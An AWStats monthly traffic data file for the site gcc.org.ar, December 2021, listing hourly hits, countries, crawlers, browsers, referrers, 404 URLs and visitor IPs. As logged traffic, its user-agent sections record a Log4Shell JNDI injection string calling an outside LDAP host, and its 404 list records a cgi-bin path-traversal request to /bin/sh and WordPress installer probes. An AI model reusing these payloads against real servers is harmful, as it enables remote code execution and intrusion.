AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202112 will be lost/reset.
# Last config file used to build this data file was /home2/tqvkyzrk/tmp/awstats/awstats.gcc.org.ar.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2008                
POS_TIME 2689                
POS_VISITOR 22286               
POS_DAY 40609               
POS_DOMAIN 3570                
POS_LOGIN 4373                
POS_ROBOT 4528                
POS_WORMS 5670                
POS_EMAILSENDER 5801                
POS_EMAILRECEIVER 5944                
POS_SESSION 41476               
POS_SIDER 41678               
POS_FILETYPES 6079                
POS_DOWNLOADS 6277                
POS_OS 7236                
POS_BROWSER 7726                
POS_SCREENSIZE 10003               
POS_UNKNOWNREFERER 10077               
POS_UNKNOWNREFERERBROWSER 10931               
POS_ORIGIN 11330               
POS_SEREFERRALS 11473               
POS_PAGEREFS 11653               
POS_SEARCHWORDS 12190               
POS_KEYWORDS 12342               
POS_MISC 2353                
POS_ERRORS 12401               
POS_CLUSTER 4229                
POS_SIDER_404 12514               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220101002231 229 50273 9175804847133
FirstTime 20211201003931
LastTime 20211231235859
LastUpdate 20220101005656 229 0 228 0 0
TotalVisits 572                 
TotalUnique 448                 
MonthHostsKnown 0                   
MonthHostsUnknown 479                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
PDFSupport 0 0 0
JavaEnabled 0 0 0
QuickTimeSupport 0 0 0
FlashSupport 0 0 0
TotalMisc 0 0 0
WindowsMediaPlayerSupport 0 0 0
DirectorSupport 0 0 0
JavascriptDisabled 0 0 0
RealPlayerSupport 0 0 0
AddToFavourites 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 34 141 4595279 66 78 664453
1 28 30 356778 71 111 1459978
2 19 39 1226168 67 119 1977645
3 25 104 4474717 54 93 1199783
4 25 96 1604425 33 42 169833
5 29 48 1313818 120 210 7334846
6 29 52 2018902 42 81 802195
7 26 84 3335544 59 93 764366
8 29 77 2517137 55 188 4862325
9 50 60 953609 75 91 670871
10 56 230 32589943 61 133 781555
11 21 76 2477055 55 128 2235286
12 23 63 2270938 80 136 1253125
13 50 197 7747692 127 288 1667380
14 43 128 4138568 112 190 2349964
15 45 94 2322908 122 192 839604
16 38 66 1881262 109 182 2692063
17 46 179 23631330 62 127 139291
18 18 55 1996427 52 102 838754
19 31 34 320013 86 149 2003793
20 32 53 1481547 59 146 915092
21 31 85 2291150 66 156 2785063
22 33 33 320758 63 144 16497436
23 31 118 11077115 49 120 1708037
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 41
us 297 767 25711810
ru 122 139 1991937
ua 74 74 746003
ar 67 695 61550591
gb 35 47 344767
cn 26 88 2735627
in 25 25 215951
se 15 15 155185
fr 13 13 135524
cl 12 33 1159232
it 11 31 1145102
ch 10 57 3146706
au 10 10 93111
nl 8 8 87917
by 5 5 56880
ir 5 5 46333
de 5 5 53789
tw 5 5 56880
ca 4 4 42413
tr 3 3 34128
th 3 3 24855
md 3 3 34128
il 3 3 12966
kr 3 19 673019
eu 3 3 31037
gr 1 1 11376
pt 2 2 19661
sg 1 1 11376
mx 1 1 8285
es 2 40 2062788
dk 2 2 19661
cz 2 2 19661
lv 2 2 19661
uy 1 20 1031394
ro 2 2 19661
at 2 2 22752
pl 1 1 11376
sa 1 1 11376
sc 1 1 8285
bd 2 2 22752
fi 2 2 19661
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 26
AhrefsBot/ 600 20373741 20211231200708 0
bingbot/ 208 17723770 20211231191018 0
baidu 138 7125675 20211229080123 0
Googlebot/ 108 3256683 20211231100521 0
Apache\-HttpClient/ 57 472245 20211228052016 0
bingpreview 41 1500650 20211220054147 0
no_user_agent 34 281690 20211231025337 0
robot 34 4910870 20211229051203 0
MJ12bot/ 33 276151 20211231231657 0
Go\-http\-client/ 31 0 20211231033955 0
Barkrowler 27 194294 20211218111758 0
360Spider 13 107705 20211231222413 0
DuckDuckGo\-Favicons\-Bot/ 10 63055 20211228113346 0
(firefox/)([0-9]\.|[0-1][0]\.) 9 77656 20211230011746 0
curl 4 0 20211220182428 0
[\s_+:,\.\;\/\\-]bot 4 37512 20211226012714 0
bot[\s_+:,\.\;\/\\-] 3 24855 20211217143028 0
crawl 3 24855 20211225075413 0
Applebot/ 3 20896 20211227191411 0
Pinterestbot 2 16570 20211203223757 0
SemrushBot/ 1 8285 20211229074059 0
Firefox/1\.5 1 8285 20211220065116 0
archive\.org_bot 1 8285 20211205064938 0
MojeekBot 1 8285 20211216075801 0
CCBot/ 1 0 20211209082149 0
CFNetwork 1 4326 20211228062334 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
woff 4 154800 0 0
html 785 7923395 0 0
js 464 14807299 0 0
jpg 395 48112186 0 0
ttf 3 154392 0 0
css 447 19112834 0 0
txt 44 3245 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 13
/.well-known/pki-validation/2950EBD88FE2DF315C3F18439EB093CF.txt 33 0 2541
/assets/videos/usina_2019.mp4 4 5 31557558
/.well-known/pki-validation/1F251201FA35E3B4DD70F7CCC5304B88.txt 1 0 64
/.well-known/pki-validation/A3D0FB5628AED7FAC8507201F3E6F14C.txt 1 0 64
/.well-known/pki-validation/6719890A6ECBB912DF69250BA5E02DB2.txt 1 0 64
/.well-known/pki-validation/7F9E517843F039EE736E3833D883F0BD.txt 1 0 64
/.well-known/pki-validation/ADE13E42E19D43C60B3E740CE0002B38.txt 1 0 64
/.well-known/pki-validation/037DED494381827F47DAA82CBF358C95.txt 1 0 64
/.well-known/pki-validation/C17247CFF71378A9A871D7FF1528C678.txt 1 0 64
/.well-known/pki-validation/DE9A7B949251F1E86860E4055D2363B1.txt 1 0 64
/.well-known/pki-validation/00EFFB7B403AD1667BF91FAE5BF42786.txt 1 0 64
/.well-known/pki-validation/8D1096C0EFB2CB565B8D79EF6D38D59B.txt 1 0 64
/.well-known/pki-validation/CF812010CF3A50E1AB9006C45EACD97E.txt 1 0 64
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 30
androidlollipop 1 1
winunknown 1 1
macosx9 4 4
winxp 13 13
ios_iphone 62 9
macosx 7 7
macosx15 91 41
macosx10 3 3
win8.1 104 104
winnt 5 5
Unknown 126 45
win10 844 299
win2000 6 6
android 51 2
macosx8 2 2
linux 443 62
win7 151 122
win98 3 3
win8 15 15
bsdopenbsd 1 1
androidmarshmallow 11 6
androidnougat 1 1
macosx13 9 7
androidoreo 74 4
linuxubuntu 14 14
winme 3 3
macosx12 1 1
macosx14 2 2
android10 60 5
androidpie 39 4
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 104
chrome90.0.4430.212 20 1
chrome45.0.2454.94 1 1
chrome68.0.3440.84 4 4
chrome96.0.4664.93 44 4
firefox60.0 1 1
chrome79.0.3945.88 1 1
chrome80.0.3987.132 2 2
chrome90.0.4430.86 2 2
firefox61.0 1 1
chrome35.0.1916.47 4 4
chrome90.0.4430.85 110 110
safari10.1 1 1
firefox84.0 3 3
chrome88.0.4324.190 2 2
opera52.0.2871.64 31 31
chrome63.0.3239.0 16 0
chrome81.0.4044.138 11 6
safari14.0.3 5 0
Unknown 60 14
chrome49.0.2623.75 2 1
chrome78.0.3904.87 21 2
chrome66.0.3359.117 2 2
firefox95.0 1 1
chrome56.0.2924.76 17 17
chrome81.0.4044.129 2 2
chrome67.0.3396.79 1 1
chrome36.0.1985.125 1 1
chrome33.0.1750.517 1 1
opera53.0.2907.99 4 4
chrome66.0.3359.181 2 2
chrome49.0.2623.112 8 3
chrome83.0.4103.106 40 4
safari14.0.2 1 1
opera53.0.2907.68 2 2
chrome90.0.4427.0 13 13
chrome96.0.4664.110 596 61
chrome88.0.4324.192 1 1
chrome79.0.3945.130 2 2
chrome76.0.3809.132 2 2
msie7.0 1 1
chrome24.0.1312.52 2 1
chrome75.0.3770.100 12 12
chrome90.0.4430.72 100 100
chrome48.0.6427.56 1 0
firefox68.0 1 1
netscape5.0 17 1
chrome92.0.4515.159 13 13
chrome90.0.4430.93 59 59
chrome89.0.4389.114 13 12
chrome85.0.4183.121 7 7
chrome95.0.4638.69 2 1
chrome75.0.3770.142 2 2
safari 21 2
chrome27.0.1453.93 1 1
firefox81.0 14 14
chrome96.0.4664.104 20 1
chrome71.0.3578.98 2 2
firefox26.0 1 1
chrome88.0.4240.193 12 12
chrome91.0.4472.114 13 12
chrome89.0.4389.128 6 1
chrome83.0.4103.97 16 16
chrome67.0.3396.99 4 4
firefox85.0 13 13
firefox59.0 2 2
msie4.01 3 3
chrome72.0.3626.109 7 7
chrome93.0.4577.99 1 1
firefox58.0 1 1
chrome60.0.3112.107 1 1
safari15.2 28 3
firefox73.0 1 0
chrome83.0.4103.61 2 2
chrome96.0.4664.45 292 25
chrome68.0.3440.106 6 6
chrome90.0.4400.8 6 6
msie11.0 20 1
mozilla 59 40
chrome92.0.4515.131 3 3
firefox57.0 1 1
msie9.0 12 5
chrome96.0.4664.92 164 10
opera8.00 3 3
chrome80.0.3987.149 1 1
chrome76.0.3809.71 20 1
safari14.0 1 1
chrome85.0.4183.83 1 1
safari11.0 19 4
chrome35.0.3319.102 1 1
firefox89.0 1 1
safari14.1.1 1 1
safari15.1 40 2
opera53.0.2907.106 2 2
chrome78.0.3904.108 9 9
msie6.0 13 13
chrome74.0.3729.169 2 2
chrome88.0.4298.0 3 3
chrome66.0.3185.161 1 1
chrome66.0.3359.139 2 2
chrome26.0.1410.65 2 2
chrome53.0.2785.116 1 1
chrome51.0.2704.103 1 1
chrome79.0 3 3
chrome87.0.4280.88 20 20
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 15
COMODO_DCV 20211228045342
Mozilla/5.0_(compatible;_Dataprovider.com) 20211211131107
data=${${::-j}ndi:ldap://156.254.126.70:1389/Exploit} 20211212102809
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20211229091021
python-requests/2.25.1 20211205135828
Mozilla/4.0_(compatible;_Synapse) 20211212055156
python-requests/2.22.0 20211229111240
Mozilla/5.0_(compatible;__centuryb.o.t9[at]gmail.com) 20211208095003
Mozilla/5.0_(compatible;_ips-agent) 20211208095659
python-requests/2.23.0 20211207171329
Mozilla/5.0 20211207180413
Sectigo_DCV 20211228045402
Mozilla/5.0_(compatible;_Yeti/1.1;__http://naver.me/spd) 20211213145545
Mozilla/5.0_(compatible;_Qwantify/2.4w;__https://www.qwant.com/) 20211230014930
python-requests/2.26.0 20211229160546
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 8
python-requests/2.22.0 20211229111240
Microsoft_Office_Excel_2014 20211222175820
python-requests/2.26.0 20211229160546
Sectigo_DCV 20211228045402
data=${${::-j}ndi:ldap://156.254.126.70:1389/Exploit} 20211212102809
python-requests/2.25.1 20211205135828
COMODO_DCV 20211228045342
python-requests/2.23.0 20211207171329
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 351 423
From1 11 11
From2 6 6
From3 43 43
From4 381 1664
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
www_google_com 1 1
www_bing_com 5 5
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 12
http://www.inboundlink.top/inbound.php 7 7
https://azaoknom.ru 6 6
https://xn----htbdjdl5ce7g.xn--p1ai 6 6
http://lordzfilmz.me 6 6
https://l.facebook.com 4 4
https://avtolombard-voronezh.ru 3 3
http://www.musicacoralnet.com.ar 3 3
https://stuffpride.com 3 3
https://webtechsurvey.com/website/gcc.org.ar 2 2
https://lesluthiers.org 1 1
https://l.instagram.com 1 1
http://aksonural.ru 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 3
403 106 11236
206 8 75163
404 1688 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 267
/camara/concierto-academia-bach-de-buenos-aires/ 1 -
/htm/edito/popu/par-mix/fr_mi.htm 2 -
/website/wp-includes/wlwmanifest.xml 13 -
/htm/edito/popu/par-mix/fe_ch.htm 1 -
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 3 -
/js/app.js 1 -
/tqvkyzrk 1 www.google.com
/wp/installer.php 1 -
/htm/cam-eng/concier/concier.htm 4 -
/apple-touch-icon-120x120-precomposed.png 2 -
/htm/edito/popu/par-mix/fr_za.gif 1 -
/htm/edito/popu/par-mix/vi_5.htm 3 http://elblogdelaeducacionmusical.blogspot.com/
/htm/edito/popu/par-mix/za_ba.htm 2 -
/htm/camara/benefactores/benefactores.htm 2 -
/htm/edito/popu/par-mix/ze_mu.htm 2 -
/htm/edito/popu/par-mix/ma_ch.htm 2 -
/htm/camara/camara.htm 4 http://www.gcc.org.ar/
/vendor/phpunit/phpunit/LICENSE 1 -
/apple-touch-icon-152x152-precomposed.png 54 -
/FORUM 1 www.google.com
/vendor/phpunit/ 1 -
/WORDPRESS 1 www.google.com
/2020/wp-includes/wlwmanifest.xml 8 -
/htm/home.htm 23 -
/htm/edito/arge/par-mix/an_c1.htm 1 -
/sitemap.xml 2 -
/wordpress/wp-includes/wlwmanifest.xml 13 -
/backup/installer-backup.php 1 -
/blog 1 www.google.com
/wp-admin/css/ 10 binance.com
/camara/chorus/ 5 -
/htm/edito/popu/par-mix/bi_ma.htm 1 -
/htm/edito/edito.htm 4 http://www.gcc.org.ar/
/htm/edito/popu/par-mix/vi_2.htm 7 http://elblogdelaeducacionmusical.blogspot.com/
/Back/wp-admin/setup-config.php 1 -
/htm/edito/xautor/mo.htm 2 -
/htm/camara/musica/musica.htm 1 -
/htm/edito/popu/par-mix/fr_za.htm 2 -
/assets/gallery/thformacion1980.jpg 3 http://www.gcc.org.ar/galeria.html
/htm/edito/popu/par-mix/ze_qh.gif 1 -
/htm/edito/popu/par-mix/ch_gr.htm 1 -
/new/wp-admin/setup-config.php 1 -
/htm/cam-fran/benefactores/benefactores.htm 2 -
/store 1 www.google.com
/humans.txt 4 -
/htm/edito/otras/quien 5 -
/backup/installer.php 1 -
/Back/dup-installer/main.installer.php 1 -
/htm/edito/arge/par-mix/an_c1.gif 1 -
/uploads/ 7 binance.com
/htm/camara/director/director.htm 4 -
/htm/edito/popu/par-fn/bu_adfn.htm 1 -
/htm/edito/popu/masc.htm 1 -
/htm/edito/arge/par-mix/mo_s1.htm 3 http://www.gcc.org.ar/
/htm/edito/popu/par-mix/ze_ca.htm 1 -
/WordPress 1 www.google.com
/htm/edito/popu/par-mix/mt_ve.htm 1 -
/htm/edito/popu/par-mix/vi_3.htm 9 -
/htm/edito/popu/par-mix/za_pl.htm 1 -
/shop/wp-includes/wlwmanifest.xml 12 -
/htm/edito/popu/par-fn/de_3.htm 4 -
/htm/edito/popu/par-mix/gi_li.htm 2 -
/htm/edito/popu/par-cm/1.htm 2 -
/htm/edito/CR/cr_ad.htm 3 -
/wp-includes/wlwmanifest.xml 13 -
/wordpress/installer-backup.php 1 -
/htm/edito/popu/par-mix/va_ma.htm 2 -
/htm/edito/popu/par-sp/ca_co.htm 2 -
/old 1 www.google.com
/htm/edito/bio/amatta.htm 2 -
/back/installer-backup.php 1 -
/new 1 www.google.com
/WP/installer.php 1 -
/camara/misa-en-si-menor-de-j-s-bach-con-la-barroca-del-suquia/ 1 -
/htm/edito/edito.html 187 -
/htm/edito/arge/par-fn/mu_prn.htm 1 -
/sito/wp-includes/wlwmanifest.xml 13 -
/htm/edito/popu/par-mix/ze_va.htm 1 -
/demo/dup-installer/main.installer.php 1 -
/Blog/dup-installer/main.installer.php 1 -
/media/wp-includes/wlwmanifest.xml 4 -
///dup-installer/main.installer.php 1 -
/wordpress/ 18 -
/htm/edito/bio/chabuca.htm 1 http://www.gcc.org.ar/
/htm/edito/arge/nini.htm 1 -
/camara/director/director.htm 3 http://www.gcc.org.ar/
/htm/edito/xautor/ho.htm 1 -
/camara 4 https://www.crawlson.com/search
/htm/edito/popu/mixt2.htm 1 -
/htm/edito/xautor/qu.htm 1 -
/demo/installer-backup.php 1 -
/htm/edito/popu/par-mix/ze_ci.htm 1 -
/Backup/wp-admin/setup-config.php 1 -
/htm/edito/popu/par-mix/rs_na2.htm 1 -
/htm/boletin/ultimo/nota7.htm 1 -
/htm/edito/instr/inst.htm 2 -
/htm/edito/cod/cor_ar.htm 4 -
/img_gral/novedades.gif 1 -
/test/wp-includes/wlwmanifest.xml 12 -
/htm/edito/img/tapas/ren_med2.jpg 3 http://clasesdecantoytecnicavocal.blogspot.com/
/wordpress/wp-admin/setup-config.php 1 -
/HTM/EDITO/les/les.htm 1 -
/camara/cam-fran/director/director.htm 1 -
/page10.html 10 -
/htm/edito/anti/par/es.htm 1 -
/htm/edito/xautor/co.htm 1 -
/1index.php 1 www.google.com
/htm/edito/arge/par-fn/rs_cun.htm 1 -
/img/flag-en.gif 1 -
/camara/wp-content/uploads/2014/02/fotoCOROfinal_home.jpg 1 https://google.com
/new/dup-installer/main.installer.php 1 -
/htm/edito/popu/par-mix/vi_6.htm 3 http://elblogdelaeducacionmusical.blogspot.com/
/back/wp-admin/setup-config.php 1 -
/2019/wp-includes/wlwmanifest.xml 12 -
/back/installer.php 1 -
/htm/edito/arge/par-mix/mn_g1.htm 1 -
/htm/edito/popu/mixt3.htm 1 -
/wordpress 1 www.google.com
/camara/temporada/page/2/ 1 -
/htm/edito/xautor/ma.htm 1 -
/wp-login.php 35 -
/old/installer-backup.php 1 -
/htm/edito/img/kul/logkul-nonar.jpg 1 -
/administrator/ 1 -
/htm/edito/ped_cat.htm 11 -
/blog/wp-includes/wlwmanifest.xml 13 -
/camara/director/ 2 -
/user/register/ 2 -
/htm/edito/xautor/fr.htm 10 -
/htm/edito/popu/par-mas/ze_so.gif 4 -
/htm/edito/doc/catalogoEDGCC_SEPT_2013a.pdf 1 -
/shop 1 www.google.com
/htm/edito/anti/ 1 -
/htm/edito/popu/par-fn/za_2n.htm 1 -
///installer.php 1 -
/htm/edito/popu/par-mix/da_es.htm 2 -
/site/wp-includes/wlwmanifest.xml 13 -
/radio.php 1 -
/htm/edito/otras/links.htm 1 -
/wikindex.php 1 -
/doc/bolet/bol03.htm 1 -
/htm/edito/anti/ch.htm 2 -
/htm/edito/popu/par-mix/mo_el.htm 2 -
/htm/edito/popu/spir.htm 37 http://www.gcc.org.ar/htm/edito/popu/spir.htm
/HTM/EDITO/otras/mus.htm 1 -
/htm/edito/popu/par-mix/za_co.htm 1 -
/new/installer-backup.php 1 -
/web/wp-includes/wlwmanifest.xml 13 -
/camara/ 43 -
/2018/wp-includes/wlwmanifest.xml 4 -
/assets/gallery/formacion2018.jpg 3 http://www.gcc.org.ar/galeria.html
/Blog/installer.php 1 -
/htm/edito/popu/par-mix/vi_1.htm 11 http://www.gcc.org.ar/
/camara/director.htm 2 -
/camara/temporada/ 1 -
/wp-includes/wp-atom.php 1 www.google.com
/htm/edito/xautor/an.htm 3 -
/htm/edito/xautor/mn.htm 1 -
/htm/edito/CR/cr_za.htm 1 -
/sites/default/files/ 8 binance.com
/htm/edito/popu/par-fn/za_can.htm 1 -
/wordpress/dup-installer/main.installer.php 1 -
/old/wp-admin/setup-config.php 1 -
/htm/edito/popu/par-mix/ze_do2.htm 1 -
/demo/wp-admin/setup-config.php 1 -
/wp1/wp-includes/wlwmanifest.xml 13 -
/htm/edito/popu/par-mix/da_pa.htm 1 -
/htm/edito/cora/tap_ferra.htm 2 -
/wp/wp-includes/wlwmanifest.xml 13 -
/wp2/wp-includes/wlwmanifest.xml 13 -
/htm/edito/popu/par-fn/fr_lan.htm 1 -
/vendor/ 1 -
/htm/edito/popu/par-mix/rs_ig.htm 2 -
/shop/installer.php 1 -
/apple-touch-icon-precomposed.png 102 -
/STORE 1 www.google.com
/htm/edito/popu/par-mix/pt_fl.htm 2 -
/htm/edito/popu/par-mix/an_ar.htm 1 -
/ads.txt 66 -
/htm/edito/CR/cr_mt.htm 1 http://juanitolagunapartituras.blogspot.com/
/files/ 7 binance.com
/htm/edito/xautor/pl.htm 1 -
/old/dup-installer/main.installer.php 1 -
///wp-admin/setup-config.php 1 -
/htm/edito/les/par-les/lesp.htm 1 -
///installer-backup.php 1 -
/htm/edito/popu/par-mix/ze_so.htm 1 -
/Blog/wp-admin/setup-config.php 1 -
/htm/edito/popu/par-mix/es_sa.htm 1 -
/apple-touch-icon-152x152.png 54 -
/htm/edito/cora/tap_esc.htm 1 -
/htm/edito/popu/par-mix/za_mu.htm 1 -
/htm/edito/popu/par-mix/fr_na.htm 1 -
/camara/musica.htm 4 -
/Back/installer-backup.php 1 -
/htm/cam-eng/director/director.htm 1 -
/htm/edito/popu/par-fn/an_mafn.htm 2 -
/news/wp-includes/wlwmanifest.xml 13 -
/htm/edito/anti/anti.htm 1 -
/htm/edito/popu/par-mix/za_go.htm 1 -
/camara/cam-fran/camara.htm 1 -
/wordpress/wp-login.php 4 http://gcc.org.ar
/Tqvkyzrk 1 www.google.com
/htm/edito/popu/par-mix/fr_re.htm 1 -
/apple-touch-icon-120x120.png 2 -
/htm/edito/CR/cr.htm 2 -
/htm/edito/bio/(Empty%20Reference!) 2 -
/camara/wp-content/uploads/2014/02/Slide2_Director.jpg 1 https://google.com
/htm/edito/popu/par-fn/de_4.htm 1 -
/htm/edito/popu/par-mix/za_ma.htm 2 -
/htm/edito/cora/tap_hom.htm 1 http://www.gcc.org.ar/
/cms/wp-includes/wlwmanifest.xml 13 -
/blog/installer.php 1 -
/camara/wp-content/uploads/2017/05/CD_convidando.pdf 1 -
/htm/edito/edito_cat.htm 2 -
/htm/edito/popu/par-mix/sa_tr.htm 2 -
/htm/edito/popu/par-mix/fr_se.htm 2 -
/htm/edito/xautor/za.htm 7 -
/HTM/EDITO/CR/cr_ad.htm 1 -
/htm/edito/anti/par/fr_co.htm 1 -
/wp 1 www.google.com
/wp/installer-backup.php 1 -
/blog/wp-login.php 4 http://gcc.org.ar
/SHOP 1 www.google.com
/htm/edito/xautor/ll.htm 1 -
/Blog/installer-backup.php 1 -
/htm/edito/popu/canmun.htm 2 -
/camara/archivos/ 1 -
/camara/contacto/ 4 -
/camara/cam-eng/camara.htm 1 -
/htm/edito/popu/mixt.htm 1 -
/images/ 7 binance.com
/htm/edito/popu/par-mix/za_ja.htm 1 -
/htm/edito/arge/mixt3.htm 1 -
/htm/edito/popu/par-mix/mo_za.htm 1 -
/back/dup-installer/main.installer.php 1 -
/old/installer.php 1 -
/htm/edito/xautor/cu.htm 1 -
/htm/edito/xautor/al.htm 1 -
/camara/benefactores/ 20 -
/camara/cam-eng/director/director.htm 2 -
/htm/edito/popu/par-mix/rs_su.htm 3 -
/htm/edito/popu/par-mix/rs_mi.htm 1 -
/WP/installer-backup.php 1 -
/forum 1 www.google.com
/WP 1 www.google.com
/htm/edito/anti/es.htm 2 -
/wp/wp-login.php 4 http://gcc.org.ar
/demo/installer.php 1 -
/htm/edito/popu/par-mix/za_pa.htm 1 -
/htm/edito/popu/par-mix/fr_no.htm 1 -
/robots.txt 237 -
/apple-touch-icon.png 103 -
/htm/edito/popu/par-fn/ta_trf.htm 2 -
/htm/edito/otras/cd_cat.htm 2 -
/htm/edito/cora/cora.htm 1 -
/readme.html 1 -
/htm/edito/popu/par-fn/cu_zafn.htm 1 -
/htm/edito/les/par-les/lesp5.htm 3 -
/htm/edito/popu/nini.htm 30 -
/wp-json/wp/v2/posts 6 gcc.org.ar/wp-json/wp/v2/posts
/camara/wp-login.php 8 http://www.gcc.org.ar/camara
/htm/edito/popu/par-mix/vi_4.htm 3 http://elblogdelaeducacionmusical.blogspot.com/
/htm/edito/anti/par/ch_sd.htm 7 -
/camara/audio/ 1 -
/admin/controller/extension/extension/ 7 binance.com
/htm/edito/popu/par-mix/vi_7.htm 7 http://www.gcc.org.ar/
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 479
200.114.190.209 34 341 39848717 20211231171000
195.123.209.118 24 24 198840 20211230031042
144.217.135.227 12 12 129592 20211211131050
178.159.37.7 10 10 113760 20211231194859
185.209.31.169 9 9 102384 20211231102629
64.62.202.79 7 7 60987 20211208095003
178.20.46.110 7 7 79632 20211215154229
104.149.165.162 6 6 49710 20211231015534
46.191.249.7 6 6 68256 20211220102845
172.255.125.170 6 6 49710 20211222072820
192.169.139.161 5 5 56880 20211223131323
93.75.49.56 5 5 56880 20211222165704
80.253.235.62 5 5 56880 20211211192853
188.163.46.154 5 5 56880 20211231053802
195.133.147.47 4 21 706040 20211206100233
121.5.226.36 4 4 33140 20211213193550
37.113.62.111 4 4 45504 20211208023234
185.190.42.200 4 4 45504 20211228213952
186.189.239.4 4 39 1299512 20211210115708
46.148.234.229 4 4 45504 20211225034057
176.31.115.13 4 4 45504 20211229025029
201.178.54.178 4 36 1630279 20211222175904
194.110.114.197 4 4 45504 20211208235952
85.4.141.189 4 27 1788677 20211227064421
181.47.15.88 4 74 10022584 20211217232458
36.110.211.2 0 2 59972 
52.16.81.163 1 1 8285 20211211070621
191.101.209.125 2 2 19661 20211209062451
50.3.194.40 1 1 8285 20211223135049
34.211.20.95 2 40 2062788 20211222143642
34.223.253.192 1 20 1031394 20211231033956
91.199.149.239 1 1 11376 20211208221852
191.101.217.92 2 2 22752 20211226084028
45.129.18.134 1 1 0 20211206220600
192.71.142.35 1 1 8285 20211221192656
171.22.76.0 3 3 27946 20211216025642
62.171.142.36 3 3 24855 20211226153638
84.17.48.25 1 1 11376 20211227001637
135.181.12.181 1 1 11376 20211217214923
194.87.146.234 1 1 8285 20211206033655
85.159.237.73 1 1 11376 20211222063548
43.224.8.116 1 1 11376 20211214080037
94.25.229.148 1 1 11376 20211212201804
54.74.122.81 1 1 8285 20211212083032
121.4.181.178 0 2 68486 
1.192.192.8 0 8 204360 
34.221.197.169 1 20 1031394 20211213071905
159.223.125.115 1 1 8972 20211226045639
62.210.80.33 1 1 11376 20211223141151
45.144.225.104 1 1 795 20211219080454
205.169.39.51 1 20 1031394 20211228045630
195.133.18.227 2 2 1590 20211203001131
35.80.33.98 1 1 8285 20211226154552
51.140.68.179 3 3 24855 20211216224830
45.87.60.40 2 2 22752 20211210001214
91.240.243.10 2 2 19661 20211220225603
92.38.136.69 3 3 34128 20211230012252
52.12.238.160 1 1 8285 20211207152113
1.169.67.149 2 2 22752 20211231134819
185.5.251.177 1 1 11376 20211219030118
147.182.246.72 1 1 8285 20211229143356
92.56.119.1 1 20 1031394 20211226184721
162.142.125.42 1 1 8285 20211201003931
172.106.16.74 1 1 8285 20211201125513
95.216.37.99 3 3 34128 20211215101103
107.175.206.119 1 1 8285 20211222184404
107.181.178.75 3 3 27946 20211222165806
54.190.25.124 1 1 8285 20211224082448
47.74.152.79 2 2 22752 20211223003325
18.236.70.22 1 20 1031394 20211206035337
187.160.9.196 1 1 8285 20211201013500
54.200.132.3 1 1 8285 20211203155928
167.172.62.217 1 1 8006 20211225210014
40.77.167.58 0 1 23217 
125.209.235.174 0 2 96078 
192.42.116.20 1 1 11376 20211228095039
54.218.106.149 1 1 8285 20211204151813
34.213.211.75 1 20 1031394 20211224124704
149.56.150.54 1 20 1031394 20211211131105
200.16.89.251 3 25 1075342 20211216174532
54.88.161.78 3 5 33738 20211215103658
161.117.5.252 1 1 11376 20211230214913
87.244.171.205 2 2 22752 20211211041421
152.32.188.74 1 6 173704 20211203162032
125.209.235.172 0 1 18994 
131.153.142.170 1 1 8285 20211218060416
193.189.100.203 2 2 22752 20211210141838
121.5.145.96 0 1 147 
